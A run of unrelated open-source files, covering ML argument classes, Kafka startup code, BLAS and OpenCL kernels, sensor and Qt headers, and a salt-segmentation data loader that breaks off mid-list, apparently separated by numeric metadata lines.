    all_metrics: Optional[List[str]] = None  # All metrics

    explicit_allreduce: bool = True  # Whether to perform explicit allreduce

    def __post_init__(self):
        # Validates regularization scales and normalizes the metric list so
        # that all_metrics is always populated and contains pmetric.
        super().__post_init__()
        assert self.l1 >= 0, "l1 scale must be non-negative"
        assert self.l2 >= 0, "l2 scale must be non-negative"
        assert self.pmetric, "Please set your primary evaluation metric using --pmetric option"

        # Set all relevant evaluation metrics
        all_metrics = self.all_metrics if self.all_metrics else [self.pmetric]
        assert self.pmetric in all_metrics, "pmetric must be within all_metrics"
        self.all_metrics = all_metrics


@arg_suite
@dataclass
class SmartComposeArg(DatasetArg, FeatureArg, OptimizationArg, NetworkArg):
    # Top-level argument suite combining all argument groups; smart-arg's
    # @arg_suite makes it constructible from the CLI.

    def __post_init__(self):
        """ Post initializes fields

        This method is automatically called by smart-arg once the argument is created by parsing cli or the constructor
        """
        logging.info(f"Start __post_init__ the argument now: {self}")
        # Cooperative chain: runs every parent class's validation in MRO order.
        super().__post_init__()
3,354
347
package org.ovirt.engine.core.common.action;

import org.ovirt.engine.core.compat.Guid;

/**
 * Parameters for moving a host (VDS) into maintenance mode.
 *
 * Carries two flags on top of the host id supplied by
 * {@link VdsActionParameters}: whether the transition was triggered
 * internally and whether Gluster services should be stopped as part of it.
 */
public class MaintenanceVdsParameters extends VdsActionParameters {

    private static final long serialVersionUID = -962696566094119431L;

    // True when maintenance was initiated by the engine itself rather than a user action.
    private boolean internal;

    // True when Gluster services on the host should be stopped during maintenance.
    private boolean stopGlusterService;

    /** No-arg constructor required for serialization frameworks. */
    public MaintenanceVdsParameters() {
    }

    public MaintenanceVdsParameters(Guid vdsId, boolean internal) {
        super(vdsId);
        this.internal = internal;
    }

    public MaintenanceVdsParameters(Guid vdsId, boolean internal, boolean stopGlusterService) {
        this(vdsId, internal);
        this.stopGlusterService = stopGlusterService;
    }

    public boolean isInternal() {
        return internal;
    }

    public boolean isStopGlusterService() {
        return stopGlusterService;
    }
}
285
450
package com.kafkasprout.backend;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

/**
 * Launches a Zookeeper server via the platform launch script, then starts a
 * Kafka broker once Zookeeper reports it has bound to its port.
 */
public class StartZoo {

    // Directory containing zookeeper.properties and server.properties.
    private String path;
    // Operating-system name, used to pick the .bat vs. shell launch script.
    private String OS;

    // Start Zookeeper Constructor
    public StartZoo(String path, String OS) {
        this.path = path;
        this.OS = OS;
    }

    /**
     * Starts Zookeeper and, once it binds to its port, delegates to
     * {@link StartBroker} to bring up Kafka.
     *
     * @return true when both Zookeeper and the Kafka broker started
     *         successfully; false on any failure.
     */
    // Process Builder to input command line arguments to start Zookeeper
    public boolean run() {
        String[] command = new String[2];
        // Case-insensitive check so "Windows 10" etc. also match.
        command[0] = OS.toLowerCase(java.util.Locale.ROOT).contains("windows")
                ? "zookeeper-server-start.bat"
                : "zookeeper-server-start";
        command[1] = path + "/" + "zookeeper.properties";
        ProcessBuilder processBuilder = new ProcessBuilder(command);

        try {
            System.out.println("Starting Zookeeper server");
            Process process = processBuilder.start();

            // try-with-resources closes the reader (and the process output
            // stream) on every exit path, fixing the leak where the reader
            // was never closed.
            try (BufferedReader reader = new BufferedReader(
                    new InputStreamReader(process.getInputStream(), java.nio.charset.StandardCharsets.UTF_8))) {
                String line;
                while ((line = reader.readLine()) != null) {
                    System.out.println(line);
                    if (line.contains("binding to port")) {
                        // If Zookeeper server started successfully, start Kafka server
                        System.out.println("Zookeeper available and bound to port");
                        boolean response = StartBroker.run(path + "/server.properties");
                        if (response) {
                            return true;
                        }
                    }
                    // [2020-07-15 17:13:41,105] INFO [KafkaServer id=0] shut down completed
                    // (kafka.server.KafkaServer)
                }
            }
        } catch (IOException e) {
            // Print stack trace if zookeeper or kafka server failed
            e.printStackTrace();
            return false;
        }
        return false;
    }
}
607
1,127
// Copyright (C) 2018-2022 Intel Corporation
// SPDX-License-Identifier: Apache-2.0
//

#pragma once

#include "kernel_base_opencl.h"
#include "kernel_selector_params.h"

namespace kernel_selector {
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// lstm_dynamic_timeloop_params
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Parameters for the dynamic-LSTM timeloop kernel. Optional tensors (hidden,
// cell, last_hidden_output, last_cell_output) are paired with has_* flags that
// record whether the tensor was explicitly provided; use the set_* helpers so
// the flag stays in sync with the tensor.
struct lstm_dynamic_timeloop_params : public base_params {
    lstm_dynamic_timeloop_params() : base_params(KernelType::LSTM_DYNAMIC_TIMELOOP) {}

    DataTensor recurrent;
    DataTensor hidden;
    DataTensor cell;
    DataTensor last_hidden_output;
    DataTensor last_cell_output;
    float clip = 0.0f;           // cell-state clipping threshold; 0 means no clipping — TODO confirm
    bool input_forget = false;
    bool has_hidden = false;
    bool has_cell = false;
    bool has_last_hidden_output = false;
    bool has_last_cell_output = false;
    int32_t direction = 1;

    // Assigns the tensor and marks it present in one step.
    void set_hidden(const DataTensor& v) {
        hidden = v;
        has_hidden = true;
    }

    void set_cell(const DataTensor& v) {
        cell = v;
        has_cell = true;
    }

    void set_last_hidden_output(const DataTensor& v) {
        last_hidden_output = v;
        has_last_hidden_output = true;
    }

    void set_last_cell_output(const DataTensor& v) {
        last_cell_output = v;
        has_last_cell_output = true;
    }

    // Extends the base key with one capability bit per optional tensor that is
    // present. Note: the "Dyanmic" spelling below matches the ParamsKey API.
    ParamsKey GetParamsKey() const override {
        ParamsKey k = base_params::GetParamsKey();

        if (has_hidden) {
            k.EnableLSTMGEMMHidden();
        }

        if (has_cell) {
            k.EnableLSTMEltCell();
        }

        if (has_last_hidden_output) {
            k.EnableLSTMDyanmicOptionalHiddenOutput();
        }

        if (has_last_cell_output) {
            k.EnableLSTMDyanmicOptionalCellOutput();
        }

        return k;
    }
};

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// lstm_dynamic_timeloop_optional_params
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
struct lstm_dynamic_optional_params : optional_params {
    lstm_dynamic_optional_params() : optional_params(KernelType::LSTM_DYNAMIC_TIMELOOP) {}
};

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// LSTM_DynamicTimeloopKernelBase
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Common base for dynamic-LSTM timeloop kernel implementations; concrete
// kernels supply GetJitConstants/SetDefault behavior.
class LSTM_DynamicTimeloopKernelBase : public KernelBaseOpenCL {
public:
    using KernelBaseOpenCL::KernelBaseOpenCL;
    virtual ~LSTM_DynamicTimeloopKernelBase() {}
    struct DispatchData : public CommonDispatchData {};

protected:
    virtual JitConstants GetJitConstants(const lstm_dynamic_timeloop_params& params) const;
    static DispatchData SetDefault(const lstm_dynamic_timeloop_params& params);
    KernelsData GetCommonKernelsData(const Params& params, const optional_params& optParams) const;
    void SetKernelArguments(const lstm_dynamic_timeloop_params& params, clKernelData& k_data) const;

    // Accepts only parameter sets of the matching kernel type.
    bool Validate(const Params& p, const optional_params&) const override {
        if (p.GetType() != KernelType::LSTM_DYNAMIC_TIMELOOP) {
            return false;
        }

        return true;
    }
};
}  // namespace kernel_selector
1,230
4,392
/*************************************************************************** Copyright (c) 2014, The OpenBLAS Project All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the OpenBLAS project nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OPENBLAS PROJECT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*****************************************************************************/

#include "common.h"

/* Panel height: rows of y processed per pass over the columns of A. */
#define NBMAX 4096

#ifndef HAVE_KERNEL_16x4

/* Fallback 4-column kernel: y[0..n) += sum_k ap[k][i] * x[k] for k in 0..3.
 * n is assumed to be a multiple of 4 (the loop unrolls by 4 rows). */
static void sgemv_kernel_16x4(BLASLONG n, FLOAT **ap, FLOAT *x, FLOAT *y)
{
    BLASLONG i;
    FLOAT *a0, *a1, *a2, *a3;
    a0 = ap[0];
    a1 = ap[1];
    a2 = ap[2];
    a3 = ap[3];

    for ( i = 0; i < n; i += 4 )
    {
        y[i]   += a0[i]  *x[0] + a1[i]  *x[1] + a2[i]  *x[2] + a3[i]  *x[3];
        y[i+1] += a0[i+1]*x[0] + a1[i+1]*x[1] + a2[i+1]*x[2] + a3[i+1]*x[3];
        y[i+2] += a0[i+2]*x[0] + a1[i+2]*x[1] + a2[i+2]*x[2] + a3[i+2]*x[3];
        y[i+3] += a0[i+3]*x[0] + a1[i+3]*x[1] + a2[i+3]*x[2] + a3[i+3]*x[3];
    }
}

#endif

/* Single-column kernel: y[0..n) += ap[i] * x[0], unrolled by 4 rows. */
static void sgemv_kernel_16x1(BLASLONG n, FLOAT *ap, FLOAT *x, FLOAT *y)
{
    BLASLONG i;
    FLOAT *a0;
    a0 = ap;

    for ( i = 0; i < n; i += 4 )
    {
        y[i]   += a0[i]  *x[0];
        y[i+1] += a0[i+1]*x[0];
        y[i+2] += a0[i+2]*x[0];
        y[i+3] += a0[i+3]*x[0];
    }
}

/* Zero the contiguous accumulation buffer. */
static void zero_y(BLASLONG n, FLOAT *dest)
{
    BLASLONG i;
    for ( i = 0; i < n; i++ )
    {
        *dest = 0.0;
        dest++;
    }
}

/* Add the contiguous panel result src[0..n) into the strided output y. */
static void add_y(BLASLONG n, FLOAT *src, FLOAT *dest, BLASLONG inc_dest)
{
    BLASLONG i;
    if ( inc_dest == 1 )
    {
        /* Unit stride: unrolled copy-add. */
        for ( i = 0; i < n; i += 4 )
        {
            dest[i]   += src[i];
            dest[i+1] += src[i+1];
            dest[i+2] += src[i+2];
            dest[i+3] += src[i+3];
        }
    }
    else
    {
        for ( i = 0; i < n; i++ )
        {
            *dest += *src;
            src++;
            dest += inc_dest;
        }
    }
}

/* Single-precision GEMV, non-transposed: y += alpha * A * x, where A is
 * column-major m-by-n with leading dimension lda, and x/y have strides
 * inc_x/inc_y. Work proceeds in row panels of at most NBMAX, accumulating
 * each panel into the caller-supplied contiguous `buffer` before adding it
 * into y; leftover rows (m % 16) are handled by scalar dot products at the
 * end. dummy1 is unused. */
int CNAME(BLASLONG m, BLASLONG n, BLASLONG dummy1, FLOAT alpha, FLOAT *a, BLASLONG lda, FLOAT *x, BLASLONG inc_x, FLOAT *y, BLASLONG inc_y, FLOAT *buffer)
{
    BLASLONG i;
    BLASLONG j;
    FLOAT *a_ptr;
    FLOAT *x_ptr;
    FLOAT *y_ptr;
    FLOAT *ap[4];
    BLASLONG n1;       /* number of 4-column groups                     */
    BLASLONG m1;       /* rows handled by full panels (multiple of 16)  */
    BLASLONG m2;       /* size of the final partial panel               */
    BLASLONG n2;       /* leftover columns (n % 4)                      */
    FLOAT xbuffer[4], *ybuffer;

    if ( m < 1 ) return(0);
    if ( n < 1 ) return(0);

    ybuffer = buffer;

    n1 = n / 4 ;
    n2 = n % 4 ;

    m1 = m - ( m % 16 );
    m2 = (m % NBMAX) - (m % 16) ;

    y_ptr = y;

    BLASLONG NB = NBMAX;

    while ( NB == NBMAX )
    {
        m1 -= NB;
        if ( m1 < 0)
        {
            /* Last (partial) panel; shrinking NB also terminates the loop. */
            if ( m2 == 0 ) break;
            NB = m2;
        }

        a_ptr = a;
        x_ptr = x;
        zero_y(NB,ybuffer);
        /* Process columns four at a time, pre-scaling x by alpha. */
        for( i = 0; i < n1 ; i++)
        {
            xbuffer[0] = alpha * x_ptr[0];
            x_ptr += inc_x;
            xbuffer[1] = alpha * x_ptr[0];
            x_ptr += inc_x;
            xbuffer[2] = alpha * x_ptr[0];
            x_ptr += inc_x;
            xbuffer[3] = alpha * x_ptr[0];
            x_ptr += inc_x;

            ap[0] = a_ptr;
            ap[1] = a_ptr + lda;
            ap[2] = ap[1] + lda;
            ap[3] = ap[2] + lda;

            sgemv_kernel_16x4(NB,ap,xbuffer,ybuffer);
            a_ptr += 4 * lda;
        }

        /* Remaining 1-3 columns, one at a time. */
        for( i = 0; i < n2 ; i++)
        {
            xbuffer[0] = alpha * x_ptr[0];
            x_ptr += inc_x;
            sgemv_kernel_16x1(NB,a_ptr,xbuffer,ybuffer);
            a_ptr += 1 * lda;
        }

        /* Fold the panel accumulator into the strided output. */
        add_y(NB,ybuffer,y_ptr,inc_y);
        a += NB;
        y_ptr += NB * inc_y;
    }

    /* Tail: the last m % 16 rows, each as a scalar dot product across all
     * n columns (alpha applied once at the end). */
    j=0;
    while ( j < (m % 16))
    {
        a_ptr = a;
        x_ptr = x;
        FLOAT temp = 0.0;
        for( i = 0; i < n; i++ )
        {
            temp += a_ptr[0] * x_ptr[0];
            a_ptr += lda;
            x_ptr += inc_x;
        }
        y_ptr[0] += alpha * temp;
        y_ptr += inc_y;
        a++;
        j++;
    }
    return(0);
}
2,226
504
#define BOOST_TEST_MODULE TestSolvers
#include <boost/test/unit_test.hpp>
#include <amgcl/backend/blaze.hpp>
#include "test_solver.hpp"

BOOST_AUTO_TEST_SUITE( test_solvers )

// Runs the shared solver test battery (test_backend from test_solver.hpp)
// against the Blaze linear-algebra backend with double precision.
BOOST_AUTO_TEST_CASE(test_blaze_backend) {
    test_backend< amgcl::backend::blaze<double> >();
}

BOOST_AUTO_TEST_SUITE_END()
175
2,215
#
# Copyright (c) 2021 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Datasets for time series anomaly detection (TSAD). All the time series in these datasets have anomaly labels.
"""
from ts_datasets.anomaly.base import TSADBaseDataset
from ts_datasets.anomaly.iops_competition import IOpsCompetition
from ts_datasets.anomaly.nab import NAB
from ts_datasets.anomaly.synthetic import Synthetic
from ts_datasets.anomaly.ucr import UCR
from ts_datasets.anomaly.smd import SMD
from ts_datasets.anomaly.smap import SMAP
from ts_datasets.anomaly.msl import MSL

__all__ = ["get_dataset", "TSADBaseDataset", "IOpsCompetition", "NAB", "Synthetic", "UCR", "SMD", "SMAP", "MSL"]


def get_dataset(dataset_name: str, rootdir: str = None) -> TSADBaseDataset:
    """
    :param dataset_name: the name of the dataset to load, formatted as ``<name>`` or ``<name>_<subset>``,
        e.g. ``IOPsCompetition`` or ``NAB_realAWSCloudwatch``
    :param rootdir: the directory where the desired dataset is stored. Not required if the package
        :py:mod:`ts_datasets` is installed in editable mode, i.e. with flag ``-e``.
    :return: the data loader for the desired dataset (and subset) desired
    """
    # Split at most once: "NAB_realAWSCloudwatch" -> ["NAB", "realAWSCloudwatch"].
    name_subset = dataset_name.split("_", maxsplit=1)
    # Loader classes are exactly the __all__ entries minus the non-loader names.
    valid_datasets = set(__all__).difference({"TSADBaseDataset", "get_dataset"})
    if name_subset[0] in valid_datasets:
        # Resolve the loader class from this module's namespace.
        cls = globals()[name_subset[0]]
    else:
        raise KeyError(
            "Dataset should be formatted as <name> or "
            "<name>_<subset>, where <name> is one of "
            f"{valid_datasets}. Got {dataset_name} instead."
        )
    # Reject a subset suffix for datasets that do not support subsets.
    if not hasattr(cls, "valid_subsets") and len(name_subset) == 2:
        raise ValueError(
            f"Dataset {name_subset[0]} does not have any subsets, "
            f"but attempted to load subset {name_subset[1]} by "
            f"specifying dataset name {dataset_name}."
        )
    # Forward the subset (if any) to the loader constructor.
    kwargs = dict() if len(name_subset) == 1 else dict(subset=name_subset[1])
    return cls(rootdir=rootdir, **kwargs)
898
657
/*
 * Copyright (c) 2016 <NAME> <https://github.com/jsuiker>
 * Copyright (c) 2018 <NAME> <<EMAIL>>
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice,
 *    this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 * 3. Neither the name of the copyright holder nor the names of its contributors
 *    may be used to endorse or promote products derived from this software without
 *    specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

/**
 * @file dht.h
 * @defgroup dht dht
 * @{
 *
 * ESP-IDF driver for DHT11, AM2301 (DHT21, DHT22, AM2302, AM2321), Itead Si7021
 *
 * Ported from esp-open-rtos
 *
 * Copyright (c) 2016 <NAME> <https://github.com/jsuiker>\n
 * Copyright (c) 2018 <NAME> <<EMAIL>>\n
 *
 * BSD Licensed as described in the file LICENSE
 *
 * @note A suitable pull-up resistor should be connected to the selected GPIO line
 *
 */
#ifndef __DHT_H__
#define __DHT_H__

#include <driver/gpio.h>
#include <esp_err.h>

#ifdef __cplusplus
extern "C" {
#endif

/**
 * Sensor type
 *
 * Selects the bit-timing profile used when reading the one-wire bus.
 */
typedef enum
{
    DHT_TYPE_DHT11 = 0,   //!< DHT11
    DHT_TYPE_AM2301,      //!< AM2301 (DHT21, DHT22, AM2302, AM2321)
    DHT_TYPE_SI7021       //!< Itead Si7021
} dht_sensor_type_t;

/**
 * @brief Read integer data from sensor on specified pin
 *
 * Humidity and temperature are returned as integers.
 * For example: humidity=625 is 62.5 %, temperature=244 is 24.4 degrees Celsius
 *
 * @param sensor_type DHT11 or DHT22
 * @param pin GPIO pin connected to sensor OUT
 * @param[out] humidity Humidity, percents * 10, nullable
 * @param[out] temperature Temperature, degrees Celsius * 10, nullable
 * @return `ESP_OK` on success
 */
esp_err_t dht_read_data(dht_sensor_type_t sensor_type, gpio_num_t pin,
        int16_t *humidity, int16_t *temperature);

/**
 * @brief Read float data from sensor on specified pin
 *
 * Humidity and temperature are returned as floats.
 *
 * @param sensor_type DHT11 or DHT22
 * @param pin GPIO pin connected to sensor OUT
 * @param[out] humidity Humidity, percents, nullable
 * @param[out] temperature Temperature, degrees Celsius, nullable
 * @return `ESP_OK` on success
 */
esp_err_t dht_read_float_data(dht_sensor_type_t sensor_type, gpio_num_t pin,
        float *humidity, float *temperature);

#ifdef __cplusplus
}
#endif

/**@}*/

#endif  // __DHT_H__
1,174
445
#pragma once

struct PU;
class QWidget;

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Host-side state handed to a plugin: the parent widget to embed UI into and
// an opaque user pointer owned by the plugin.
struct PrivData {
    QWidget* parent;
    void* user_data;
};

// TODO: Should not be here

// A loaded plugin: its private host data plus its PU ui instance.
struct PluginInstance {
    PrivData priv;
    PU* ui_inst;
};

// Creates the test plugin parented to the given widget.
// Ownership of the returned instance is not documented here — confirm at call sites.
PluginInstance* PluginUI_createTestPlugin(QWidget* parent);
114
515
/*============================================================================= Library: CTK Copyright (c) German Cancer Research Center, Division of Medical and Biological Informatics Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. =============================================================================*/ #ifndef CTKCMDLINEMODULEXMLPROGRESSWATCHER_H #define CTKCMDLINEMODULEXMLPROGRESSWATCHER_H #include "ctkCommandLineModulesCoreExport.h" #include <QObject> class ctkCmdLineModuleXmlProgressWatcherPrivate; class QIODevice; class QProcess; /** * \class ctkCmdLineModuleXmlProgressWatcher * \brief Provides progress updates of a module. * \ingroup CommandLineModulesCore_API * * This class is usually only used by back-end implementators for modules * which can report progress and results in the form of XML fragments written * to a QIODevice. 
*/

class CTK_CMDLINEMODULECORE_EXPORT ctkCmdLineModuleXmlProgressWatcher : public QObject
{
  Q_OBJECT

public:

  // Watch XML progress fragments from a generic I/O device.
  ctkCmdLineModuleXmlProgressWatcher(QIODevice* input);
  // Watch a running process; also surfaces its stderr via errorDataAvailable().
  ctkCmdLineModuleXmlProgressWatcher(QProcess* input);
  ~ctkCmdLineModuleXmlProgressWatcher();

Q_SIGNALS:

  // Emitted when a filter (module execution stage) reports that it started.
  void filterStarted(const QString& name, const QString& comment);

  // Emitted on progress updates; progress is the value parsed from the XML.
  void filterProgress(float progress, const QString& comment);

  // Emitted when the module reports a named result value.
  void filterResult(const QString& parameter, const QString& value);

  // Emitted when a filter reports completion.
  void filterFinished(const QString& name, const QString& comment);

  // Emitted when the incoming XML could not be parsed.
  void filterXmlError(const QString& error);

  // Raw (non-XML) output/error bytes passed through from the input.
  void outputDataAvailable(const QByteArray& outputData);
  void errorDataAvailable(const QByteArray& errorData);

private:

  friend class ctkCmdLineModuleXmlProgressWatcherPrivate;

  Q_PRIVATE_SLOT(d, void _q_readyRead())
  Q_PRIVATE_SLOT(d, void _q_readyReadError())

  // NOTE(review): QScopedPointer is used but only <QObject> is included above —
  // this relies on a transitive include; confirm <QScopedPointer> is reachable.
  QScopedPointer<ctkCmdLineModuleXmlProgressWatcherPrivate> d;
};

#endif // CTKCMDLINEMODULEXMLPROGRESSWATCHER_H
677
464
from .action import TaskRefuse, DisconnectionRefuse, ConnectionRefuse, TaskFail from .slave import Slave
26
1,016
package com.thinkbiganalytics.kylo.catalog.spark;

/*-
 * #%L
 * Kylo Catalog for Spark 2
 * %%
 * Copyright (C) 2017 - 2018 ThinkBig Analytics
 * %%
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 * #L%
 */

import com.thinkbiganalytics.kylo.catalog.api.KyloCatalogClient;
import com.thinkbiganalytics.kylo.catalog.spi.DataSetProvider;

import org.apache.spark.sql.Dataset;
import org.apache.spark.sql.Row;
import org.apache.spark.sql.SparkSession;

import java.util.List;

import javax.annotation.Nonnull;

/**
 * Implementation of {@link KyloCatalogClient} that supports Spark 2.
 *
 * <p>Delegates catalog behavior to the abstract base class (constructed with the
 * session's underlying {@code SparkContext}) and keeps the {@link SparkSession}
 * for Spark-2-specific data set access.</p>
 */
public class KyloCatalogClientV2 extends AbstractKyloCatalogClient<Dataset<Row>> {

    /**
     * Spark session
     */
    @Nonnull
    private final SparkSession sparkSession;

    /**
     * Constructs a {@code KyloCatalogClientV2} using the specified Spark session and data set providers.
     *
     * @param sparkSession the active Spark session backing this client
     * @param dataSetProviders providers consulted for reading/writing data sets
     */
    KyloCatalogClientV2(@Nonnull final SparkSession sparkSession, @Nonnull final List<DataSetProvider<Dataset<Row>>> dataSetProviders) {
        super(sparkSession.sparkContext(), dataSetProviders);
        this.sparkSession = sparkSession;
    }

    /**
     * Gets the Spark session.
     *
     * @return the session supplied at construction, never {@code null}
     */
    @Nonnull
    public SparkSession getSparkSession() {
        return sparkSession;
    }

    /**
     * {@inheritDoc}
     *
     * <p>Reports whether the session's underlying SparkContext has been stopped.</p>
     */
    @Override
    protected boolean isSparkStopped() {
        return sparkSession.sparkContext().isStopped();
    }
}
630
9,680
<reponame>dutxubo/nni<filename>examples/trials/kaggle-tgs-salt/loader.py # Copyright (c) Microsoft Corporation # All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, # to any person obtaining a copy of this software and associated # documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and # to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING # BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
import os, cv2, glob
import numpy as np
from PIL import Image

import torch
import torch.utils.data as data
from torchvision import datasets, models, transforms

from utils import read_masks, get_test_meta, get_nfold_split
import augmentation as aug
from settings import *


class ImageDataset(data.Dataset):
    """TGS Salt dataset: yields (image, mask, salt_exists) in train mode, [image] otherwise.

    ``meta`` is a DataFrame with at least ID_COLUMN, 'salt_exists' and 'is_train'
    columns (Y_COLUMN too in train mode). Transforms are applied in aug_image().
    """

    def __init__(self, train_mode, meta, augment_with_target=None,
                 image_augment=None, image_transform=None, mask_transform=None):
        # Joint geometric augmentation applied to image AND mask together.
        self.augment_with_target = augment_with_target
        # Image-only augmentation (e.g. color jitter).
        self.image_augment = image_augment
        self.image_transform = image_transform
        self.mask_transform = mask_transform

        self.train_mode = train_mode
        self.meta = meta
        self.img_ids = meta[ID_COLUMN].values
        self.salt_exists = meta['salt_exists'].values
        # Per-row flag distinguishing train-set images from (pseudo-labeled) test images.
        self.is_train = meta['is_train'].values

        if self.train_mode:
            self.mask_filenames = meta[Y_COLUMN].values

    def __getitem__(self, index):
        base_img_fn = '{}.png'.format(self.img_ids[index])
        # Image directory depends on where this row originated, not on train_mode,
        # so pseudo-labeled test rows are loaded from the test image dir.
        if self.is_train[index]: #self.train_mode:
            img_fn = os.path.join(TRAIN_IMG_DIR, base_img_fn)
        else:
            img_fn = os.path.join(TEST_IMG_DIR, base_img_fn)
        img = self.load_image(img_fn)

        if self.train_mode:
            base_mask_fn = '{}.png'.format(self.img_ids[index])
            if self.is_train[index]:
                mask_fn = os.path.join(TRAIN_MASK_DIR, base_mask_fn)
            else:
                # Pseudo-label masks live under the test directory.
                mask_fn = os.path.join(TEST_DIR, 'masks', base_mask_fn)
            mask = self.load_image(mask_fn, True)
            img, mask = self.aug_image(img, mask)
            return img, mask, self.salt_exists[index]
        else:
            img = self.aug_image(img)
            return [img]

    def aug_image(self, img, mask=None):
        """Apply augmentation/transform chain; with a mask, joint ops run first."""
        if mask is not None:
            if self.augment_with_target is not None:
                img, mask = self.augment_with_target(img, mask)
            if self.image_augment is not None:
                img = self.image_augment(img)
            if self.mask_transform is not None:
                mask = self.mask_transform(mask)
            if self.image_transform is not None:
                img = self.image_transform(img)
            return img, mask
        else:
            if self.image_augment is not None:
                img = self.image_augment(img)
            if self.image_transform is not None:
                img = self.image_transform(img)
            return img

    def load_image(self, img_filepath, grayscale=False):
        """Load a PIL image; grayscale mode binarizes at threshold 128 (for masks)."""
        image = Image.open(img_filepath, 'r')
        if not grayscale:
            image = image.convert('RGB')
        else:
            image = image.convert('L').point(lambda x: 0 if x < 128 else 1, 'L')
        return image

    def __len__(self):
        return len(self.img_ids)

    def collate_fn(self, batch):
        """Stack samples into batch tensors; adds salt-exists targets in train mode."""
        imgs = [x[0] for x in batch]
        inputs = torch.stack(imgs)

        if self.train_mode:
            masks = [x[1] for x in batch]
            labels = torch.stack(masks)
            salt_target = [x[2] for x in batch]
            return inputs, labels, torch.FloatTensor(salt_target)
        else:
            return inputs


def mask_to_tensor(x):
    """PIL mask -> float32 tensor with a leading channel dimension (1, H, W)."""
    x = np.array(x).astype(np.float32)
    x = np.expand_dims(x, axis=0)
    x = torch.from_numpy(x)
    return x

# Shared tail of every image transform: 3-channel grayscale + ImageNet normalization.
img_transforms = [
    transforms.Grayscale(num_output_channels=3),
    transforms.ToTensor(),
